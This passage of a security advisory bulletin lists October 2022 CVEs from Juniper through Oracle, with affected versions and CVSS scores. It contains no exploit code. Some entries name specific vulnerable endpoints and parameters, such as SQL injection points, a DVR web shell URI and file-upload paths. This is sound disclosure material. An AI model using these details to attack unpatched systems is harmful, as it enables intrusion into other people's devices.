juniper — junos_os_evolved An Improper Validation of Syntactic Correctness of Input vulnerability in the kernel of Juniper Networks Junos OS Evolved on PTX series allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). When an incoming TCP packet destined to the device is malformed there is a possibility of a kernel panic. Only TCP packets destined to the ports for BGP, LDP and MSDP can trigger this. This issue only affects PTX10004, PTX10008, PTX10016. No other PTX Series devices or other platforms are affected. This issue affects Juniper Networks Junos OS Evolved: 20.4-EVO versions prior to 20.4R3-S4-EVO; 21.3-EVO versions prior to 21.3R3-EVO; 21.4-EVO versions prior to 21.4R3-EVO; 22.1-EVO versions prior to 22.1R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 20.4R1-EVO. 2022-10-18 7.5 CVE-2022-22192
CONFIRM
juniper — junos_os_evolved A limitless resource allocation vulnerability in FPC resources of Juniper Networks Junos OS Evolved on PTX Series allows an unprivileged attacker to cause Denial of Service (DoS). Continuously polling the SNMP jnxCosQstatTable causes the FPC to run out of GUID space, causing a Denial of Service to the FPC resources. When the FPC runs out of the GUID space, you will see the following syslog messages. The evo-aftmand-bt process is asserting.
fpc1 evo-aftmand-bt[17556]: %USER-3: get_next_guid: Ran out of Guid Space start 1748051689472 end 1752346656767
fpc1 audit[17556]: %AUTH-5: ANOM_ABEND auid=4294967295 uid=0 gid=0 ses=4294967295 pid=17556 comm="EvoAftManBt-mai" exe="/usr/sbin/evo-aftmand-bt" sig=6
fpc1 kernel: %KERN-5: audit: type=1701 audit(1648567505.119:57): auid=4294967295 uid=0 gid=0 ses=4294967295 pid=17556 comm="EvoAftManBt-mai" exe="/usr/sbin/evo-aftmand-bt" sig=6
fpc1 emfd-fpa[14438]: %USER-5: Alarm set: APP color=red, class=CHASSIS, reason=Application evo-aftmand-bt fail on node Fpc1
fpc1 emfd-fpa[14438]: %USER-3-EMF_FPA_ALARM_REP: RaiseAlarm: Alarm(Location: /Chassis[0]/Fpc[1] Module: sysman Object: evo-aftmand-bt:0 Error: 2) reported
fpc1 sysepochman[12738]: %USER-5-SYSTEM_REBOOT_EVENT: Reboot [node] [ungraceful reboot] [evo-aftmand-bt exited]
The FPC resources can be monitored using the following commands:
user@router> start shell
[vrf:none] user@router-re0:~$ cli -c "show platform application-info allocations app evo-aftmand-bt" | grep ^fpc | grep -v Route | grep -i -v Nexthop | awk '{total[$1] += $5} END { for (key in total) { print key " " total[key]/4294967296 }}'
Once the FPCs become unreachable they must be manually restarted as they do not self-recover.
This issue affects Juniper Networks Junos OS Evolved on PTX Series: All versions prior to 20.4R3-S4-EVO; 21.1-EVO version 21.1R1-EVO and later versions; 21.2-EVO version 21.2R1-EVO and later versions; 21.3-EVO versions prior to 21.3R3-EVO; 21.4-EVO versions prior to 21.4R2-EVO; 22.1-EVO versions prior to 22.1R2-EVO. 2022-10-18 7.5 CVE-2022-22211
CONFIRM
juniper — junos_os_evolved An Improper Input Validation vulnerability in ingress TCP segment processing of Juniper Networks Junos OS Evolved allows a network-based unauthenticated attacker to send a crafted TCP segment to the device, triggering a kernel panic, leading to a Denial of Service (DoS) condition. Continued receipt and processing of this TCP segment could create a sustained Denial of Service (DoS) condition. This issue affects Juniper Networks Junos OS Evolved: 21.3 versions prior to 21.3R3-EVO; 21.4 versions prior to 21.4R2-EVO; 22.1 versions prior to 22.1R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 21.3R1-EVO. 2022-10-18 7.5 CVE-2022-22247
CONFIRM
juniper — junos_os_evolved An Incorrect Permission Assignment vulnerability in shell processing of Juniper Networks Junos OS Evolved allows a low-privileged local user to modify the contents of a configuration file which could cause another user to execute arbitrary commands within the context of the follow-on user’s session. If the follow-on user is a high-privileged administrator, the attacker could leverage this vulnerability to take complete control of the target system. While this issue is triggered by a user, other than the attacker, accessing the Junos shell, an attacker simply requires Junos CLI access to exploit this vulnerability. This issue affects Juniper Networks Junos OS Evolved: 20.4-EVO versions prior to 20.4R3-S1-EVO; All versions of 21.1-EVO; 21.2-EVO versions prior to 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 19.2R1-EVO. 2022-10-18 7.3 CVE-2022-22248
CONFIRM
juniper — paragon_active_assurance_control_center An Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability, a stored XSS (or persistent), in the Control Center Controller web pages of Juniper Networks Paragon Active Assurance (Formerly Netrounds) allows a high-privilege attacker with ‘WRITE’ permissions to store one or more malicious scripts that will infect any other authorized user’s account when they accidentally trigger the malicious script(s) while managing the device. Triggering these attacks enables the attacker to execute commands with the permissions up to that of the superuser account. This issue affects: Juniper Networks Paragon Active Assurance (Formerly Netrounds) All versions prior to 3.1.1; 3.2 versions prior to 3.2.1. 2022-10-18 8.4 CVE-2022-22229
CONFIRM
keking — kkfileview kkFileView 4.0 is vulnerable to Server-side request forgery (SSRF) via controllerOnlinePreviewController.java. 2022-10-17 9.8 CVE-2022-42149
MISC
lavalite — lavalite In Lavalite 9.0.0, the XSRF-TOKEN cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. 2022-10-18 7.5 CVE-2022-42188
MISC
libtiff — libtiff Multiple heap buffer overflows in the tiffcrop.c utility in libtiff library version 4.4.0 allow an attacker to trigger unsafe or out-of-bounds memory access via a crafted TIFF image file, which could result in an application crash, potential information disclosure or any other context-dependent impact. 2022-10-21 9.8 CVE-2022-3570
MISC
MISC
MISC
CONFIRM
linux — linux_kernel An issue was discovered in the Linux kernel before 5.19.16. Attackers able to inject WLAN frames could cause a buffer overflow in the ieee80211_bss_info_update function in net/mac80211/scan.c. 2022-10-14 8.1 CVE-2022-41674
MISC
MISC
MISC
MISC
MISC
FEDORA
FEDORA
FEDORA
DEBIAN
linux — linux_kernel A vulnerability classified as critical has been found in Linux Kernel. Affected is the function btf_dump_name_dups of the file tools/lib/bpf/btf_dump.c of the component libbpf. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211032. 2022-10-17 8 CVE-2022-3534
N/A
N/A
linux — linux_kernel A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087. 2022-10-17 8 CVE-2022-3564
MISC
MISC
linux — linux_kernel A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function del_timer of the file drivers/isdn/mISDN/l1oip_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211088. 2022-10-17 8 CVE-2022-3565
MISC
MISC
linux — linux_kernel A vulnerability classified as critical has been found in Linux Kernel. This affects the function spl2sw_nvmem_get_mac_address of the file drivers/net/ethernet/sunplus/spl2sw_driver.c of the component BPF. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211041 was assigned to this vulnerability. 2022-10-17 7.8 CVE-2022-3541
N/A
N/A
linux — linux_kernel A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability. 2022-10-17 7.8 CVE-2022-3545
N/A
N/A
linux — linux_kernel An out-of-bounds memory write flaw was found in the Linux kernel’s Kid-friendly Wired Controller driver. This flaw allows a local user to crash or potentially escalate their privileges on the system. It is in bigben_probe of drivers/hid/hid-bigbenff.c. The cause is an incorrect assumption that all bigben devices have inputs. However, malicious devices can break this assumption, leading to an out-of-bounds write. 2022-10-20 7.8 CVE-2022-3577
MISC
MISC
MISC
linux — linux_kernel Various refcounting bugs in the multi-BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to trigger use-after-free conditions to potentially execute code. 2022-10-14 7.8 CVE-2022-42720
MISC
MISC
MISC
FEDORA
FEDORA
FEDORA
DEBIAN
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function ipv6_renew_options of the component IPv6 Handler. The manipulation leads to memory leak. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211021 was assigned to this vulnerability. 2022-10-16 7.5 CVE-2022-3524
MISC
MISC
linux — linux_kernel A vulnerability classified as problematic was found in Linux Kernel. This vulnerability affects the function macvlan_handle_frame of the file drivers/net/macvlan.c of the component skb. The manipulation leads to memory leak. The attack can be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211024. 2022-10-16 7.5 CVE-2022-3526
MISC
MISC
linux — linux_kernel A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function ipneigh_get of the file ip/ipneigh.c of the component iproute2. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211025 was assigned to this vulnerability. 2022-10-16 7.5 CVE-2022-3527
MISC
MISC
linux — linux_kernel A vulnerability, which was classified as problematic, was found in Linux Kernel. Affected is the function mptcp_addr_show of the file ip/ipmptcp.c of the component iproute2. The manipulation leads to memory leak. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. VDB-211026 is the identifier assigned to this vulnerability. 2022-10-16 7.5 CVE-2022-3528
MISC
MISC
linux — linux_kernel A vulnerability has been found in Linux Kernel and classified as problematic. Affected by this vulnerability is the function fdb_get of the file bridge/fdb.c of the component iproute2. The manipulation leads to memory leak. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211027. 2022-10-16 7.5 CVE-2022-3529
MISC
MISC
linux — linux_kernel A vulnerability was found in Linux Kernel and classified as problematic. Affected by this issue is the function ipaddr_link_get of the file ip/ipaddress.c of the component iproute2. The manipulation leads to memory leak. The attack may be launched remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211028. 2022-10-16 7.5 CVE-2022-3530
MISC
MISC
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component BPF. The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363. 2022-10-18 7.5 CVE-2022-3594
N/A
N/A
linux — linux_kernel A vulnerability, which was classified as problematic, was found in Linux Kernel. This affects the function tcp_getsockopt/tcp_setsockopt of the component TCP Handler. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. The identifier VDB-211089 was assigned to this vulnerability. 2022-10-17 7.1 CVE-2022-3566
MISC
MISC
linux — linux_kernel A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function inet6_stream_ops/inet6_dgram_ops of the component IPv6 Handler. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. VDB-211090 is the identifier assigned to this vulnerability. 2022-10-17 7.1 CVE-2022-3567
MISC
MISC
linux — linux_kernel A vulnerability was found in Linux Kernel and classified as problematic. This issue affects the function hugetlb_no_page of the file mm/hugetlb.c. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211019. 2022-10-16 7 CVE-2022-3522
MISC
MISC
magento — magento Adobe Commerce versions 2.4.3-p2 (and earlier), 2.3.7-p3 (and earlier) and 2.4.4 (and earlier) are affected by an improper input validation vulnerability. An authenticated attacker can trigger an insecure direct object reference in the `V1/customers/me` endpoint to achieve information exposure and privilege escalation. 2022-10-20 8.8 CVE-2022-42344
MISC
markdownify_project — markdownify Markdownify version 1.4.1 allows an external attacker to execute arbitrary code remotely on any client attempting to view a malicious markdown file through Markdownify. This is possible because the application has the “nodeIntegration” option enabled. 2022-10-19 7.8 CVE-2022-41709
MISC
MISC
megazone — reversewall-mds Remote code execution vulnerability due to insufficient user privilege verification in reverseWall-MDS. Remote attackers can exploit the vulnerability through remote code execution, for example to steal accounts. 2022-10-17 9.8 CVE-2022-23769
MISC
merchandise_online_store_project — merchandise_online_store A SQL Injection issue in Merchandise Online Store v.1.0 allows an attacker to log in to the admin account. 2022-10-17 9.8 CVE-2022-42237
MISC
mikrotik — routeros The Mikrotik RouterOS web server allows memory corruption in releases before Stable 6.38.5 and Long-term 6.37.5, aka Chimay-Red. A remote and unauthenticated user can trigger the vulnerability by sending a crafted HTTP request. An attacker can use this vulnerability to execute arbitrary code on the affected system, as exploited in the wild in mid-2017 and later. 2022-10-15 9.8 CVE-2017-20149
MISC
MISC
minimatch_project — minimatch A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service. 2022-10-17 7.5 CVE-2022-3517
MISC
MISC
mozilla — network_security_services A vulnerability was found in nss. With this vulnerability, nss client authentication crashes when there is no user certificate in the database, which can lead to a segmentation fault or crash. 2022-10-14 7.5 CVE-2022-3479
MISC
MISC
mvpower — tv-7104he_firmware MVPower CCTV DVR models, including TV-7104HE 1.8.4 115215B9 and TV7108HE, contain a web shell that is accessible via a /shell URI. A remote unauthenticated attacker can execute arbitrary operating system commands as root. This vulnerability has also been referred to as the “JAWS webserver RCE” because of the easily identifiable HTTP response server field. Other firmware versions, at least from 2014 through 2019, can be affected. This was exploited in the wild in 2017 through 2022. 2022-10-19 9.8 CVE-2016-20016
MISC
MISC
MISC
netapp — clustered_data_ontap Clustered Data ONTAP versions 9.11.1 through 9.11.1P2 with SnapLock configured FlexGroups are susceptible to a vulnerability which could allow an authenticated remote attacker to arbitrarily modify or delete WORM data prior to the end of the retention period. 2022-10-19 8.1 CVE-2022-23241
MISC
netgear — r6220_firmware Netgear R6220 v1.1.0.114_1.0.1 suffers from Incorrect Access Control, resulting in a command injection vulnerability. 2022-10-17 8.8 CVE-2022-42221
MISC
MISC
nopcommerce — nopcommerce An access control issue in nopcommerce v4.50.2 allows attackers to arbitrarily modify any customer’s address via the addressedit endpoint. 2022-10-19 7.5 CVE-2022-33077
MISC
MISC
ocomon_project — ocomon OcoMon 4.0RC1 is vulnerable to Incorrect Access Control. Through a request, a user can obtain the real email address; by sending the same request with the correct email, account takeover is possible. 2022-10-19 7.5 CVE-2022-40798
MISC
MISC
octopus — octopus_server In affected versions of Octopus Server it is possible to use the Git Connectivity test function on the VCS project to initiate an SMB request resulting in the potential for an NTLM relay attack. 2022-10-14 8.1 CVE-2022-2780
MISC
online_birth_certificate_management_system_project — online_birth_certificate_management_system Online Birth Certificate Management System version 1.0 is vulnerable to Cross Site Request Forgery (CSRF). 2022-10-14 8.8 CVE-2022-42070
MISC
MISC
online_tours_&_travels_management_system_project — online_tours_&_travels_management_system Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /user/update_booking.php. 2022-10-14 7.2 CVE-2022-41416
MISC
online_tours_&_travels_management_system_project — online_tours_&_travels_management_system Online Tours & Travels Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /user_operations/profile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-18 7.2 CVE-2022-41537
MISC
online_tours_and_travels_management_system_project — online_tours_and_travels_management_system Online Tours & Travels Management System v1.0 is vulnerable to Arbitrary code execution via ip/tour/admin/operations/update_settings.php. 2022-10-17 7.2 CVE-2022-42142
MISC
open_source_sacco_management_system_project — open_source_sacco_management_system Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/manage_borrower.php. 2022-10-14 7.2 CVE-2022-41535
MISC
open_source_sacco_management_system_project — open_source_sacco_management_system Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/manage_user.php. 2022-10-14 7.2 CVE-2022-41536
MISC
open_source_sacco_management_system_project — open_source_sacco_management_system Open Source SACCO Management System v1.0 is vulnerable to SQL Injection via /sacco_shield/manage_payment.php. 2022-10-17 7.2 CVE-2022-42143
MISC
open_source_sacco_management_system_project — open_source_sacco_management_system Open Source SACCO Management System v1.0 is vulnerable to SQL Injection via /sacco_shield/manage_loan.php. 2022-10-18 7.2 CVE-2022-42218
MISC
opencats — opencats OpenCATS v0.9.6 was discovered to contain a remote code execution (RCE) vulnerability via the getDataGridPager’s ajax functionality. 2022-10-19 9.8 CVE-2022-43019
MISC
openharmony — openharmony OpenHarmony-v3.1.2 and prior versions have an authentication bypass vulnerability in a callback handler function of Softbus_server in the communication subsystem. Attackers can launch attacks on distributed networks by sending Bluetooth rfcomm packets to any remote device and executing arbitrary commands. 2022-10-14 8.8 CVE-2022-42463
MISC
openharmony — openharmony OpenHarmony-v3.1.2 and prior versions, 3.0.6 and prior versions have a kernel memory pool override vulnerability in the /dev/mmz_userdev device driver. The impact depends on the privileges of the attacker. An unprivileged process running on the device could disclose sensitive information, including a kernel pointer, which could be used in further attacks. Processes with the system user UID running on the device would be able to mmap memory pools used by the kernel and override them, which could be used to gain kernel code execution on the device, gain root privileges, or cause a device reboot. 2022-10-14 7.8 CVE-2022-42464
MISC
openharmony — openharmony OpenHarmony-v3.1.2 and prior versions have a missing permission validation vulnerability in the param service of the startup subsystem. A malicious application installed on the device could elevate its privileges to the root user, disable security features, or cause DoS by disabling particular services. 2022-10-14 7.8 CVE-2022-42488
MISC
opensecurity — mobile_security_framework Mobile Security Framework (MobSF) v0.9.2 and below was discovered to contain a local file inclusion (LFI) vulnerability in the StaticAnalyzer/views.py script. This vulnerability allows attackers to read arbitrary files via a crafted HTTP request. 2022-10-18 7.5 CVE-2022-41547
MISC
MISC
oracle — access_manager Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: Admin Console). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Access Manager accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). 2022-10-18 7.5 CVE-2022-39412
MISC
oracle — bi_publisher Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Core Formatting API). Supported versions that are affected are 5.9.0.0, 6.4.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data as well as unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle BI Publisher. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L). 2022-10-18 7.6 CVE-2022-21590
MISC
oracle — database Vulnerability in the Oracle Database – Advanced Queuing component of Oracle Database Server. The supported version that is affected is 19c. Easily exploitable vulnerability allows high privileged attacker having DBA user privilege with network access via Oracle Net to compromise Oracle Database – Advanced Queuing. Successful attacks of this vulnerability can result in takeover of Oracle Database – Advanced Queuing. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). 2022-10-18 7.2 CVE-2022-21596
MISC
oracle — database_-_sharding Vulnerability in the Oracle Database – Sharding component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Local Logon to compromise Oracle Database – Sharding. Successful attacks of this vulnerability can result in takeover of Oracle Database – Sharding. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). 2022-10-18 7.2 CVE-2022-21603
MISC
oracle — e-business_suite Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2022-10-18 9.8 CVE-2022-21587
MISC
oracle — enterprise_data_quality Vulnerability in the Oracle Enterprise Data Quality product of Oracle Fusion Middleware (component: Dashboard). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Data Quality. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Enterprise Data Quality, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Enterprise Data Quality accessible data as well as unauthorized update, insert or delete access to some of Oracle Enterprise Data Quality accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Data Quality. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L). 2022-10-18 8.8 CVE-2022-21613
MISC
oracle — enterprise_data_quality Vulnerability in the Oracle Enterprise Data Quality product of Oracle Fusion Middleware (component: Dashboard). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Enterprise Data Quality. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Enterprise Data Quality accessible data as well as unauthorized access to critical data or complete access to all Oracle Enterprise Data Quality accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). 2022-10-18 8.1 CVE-2022-21612
MISC
oracle — enterprise_data_quality Vulnerability in the Oracle Enterprise Data Quality product of Oracle Fusion Middleware (component: Dashboard). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Data Quality. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Enterprise Data Quality accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). 2022-10-18 7.5 CVE-2022-21614
MISC
oracle — enterprise_data_quality Vulnerability in the Oracle Enterprise Data Quality product of Oracle Fusion Middleware (component: Dashboard). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Data Quality. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Enterprise Data Quality, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Enterprise Data Quality accessible data. CVSS 3.1 Base Score 7.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N). 2022-10-18 7.4 CVE-2022-21615
MISC
oracle — enterprise_manager_base_platform Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Application Config Console). Supported versions that are affected are 13.4.0.0 and 13.5.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Enterprise Manager Base Platform accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N). 2022-10-18 7.5 CVE-2022-21623
MISC
oracle — graalvm Vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: LLVM Interpreter). Supported versions that are affected are Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle GraalVM Enterprise Edition. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 7.5 CVE-2022-21634
MISC
oracle — http_server Vulnerability in the Oracle HTTP Server product of Oracle Fusion Middleware (component: OHS Config MBeans). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle HTTP Server accessible data as well as unauthorized update, insert or delete access to some of Oracle HTTP Server accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N). 2022-10-18 7.1 CVE-2022-21593
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.27 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). 2022-10-18 7.2 CVE-2022-21600
MISC
oracle — peoplesoft_enterprise_common_components Vulnerability in the PeopleSoft Enterprise Common Components product of Oracle PeopleSoft (component: Approval Framework). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise Common Components. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all PeopleSoft Enterprise Common Components accessible data as well as unauthorized access to critical data or complete access to all PeopleSoft Enterprise Common Components accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). 2022-10-18 8.1 CVE-2022-39406
MISC
oracle — siebel_core_-_db_deployment_and_configuration_accessible_data Vulnerability in the Siebel Core – DB Deployment and Configuration product of Oracle Siebel CRM (component: Repository Utilities). Supported versions that are affected are 22.8 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Siebel Core – DB Deployment and Configuration. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Siebel Core – DB Deployment and Configuration accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N). 2022-10-18 7.5 CVE-2022-21598
MISC
oracle — soa_suite Vulnerability in the Oracle SOA Suite product of Oracle Fusion Middleware (component: Adapters). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle SOA Suite. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle SOA Suite accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N). 2022-10-18 7.5 CVE-2022-21622
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows systems only. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). 2022-10-18 8.8 CVE-2022-39427
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows unauthenticated attacker with network access via VRDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). 2022-10-18 8.1 CVE-2022-39424
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows unauthenticated attacker with network access via VRDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). 2022-10-18 8.1 CVE-2022-39425
MISC
